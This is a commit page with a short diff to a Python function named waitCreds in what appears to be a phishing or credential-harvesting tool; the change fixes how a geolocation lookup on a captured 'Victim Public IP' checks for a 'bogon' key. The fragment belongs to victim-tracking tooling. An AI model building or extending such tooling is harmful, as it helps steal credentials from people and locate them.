Fix for json key check

This commit is contained in:
Alexey Mozzhakov 2018-06-20 19:17:31 +03:00 committed by GitHub
parent 99c1beef18
commit 88bb59797f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -152,7 +152,7 @@ def waitCreds():
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip).read()
ipinfo = json.loads(resp)
if (ipinfo['bogon'] != None):
if 'bogon' in ipinfo:
print ('======================================================================'.format(RED, END))
print (' \n{0}[ VICTIM IP BOGUS ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
else: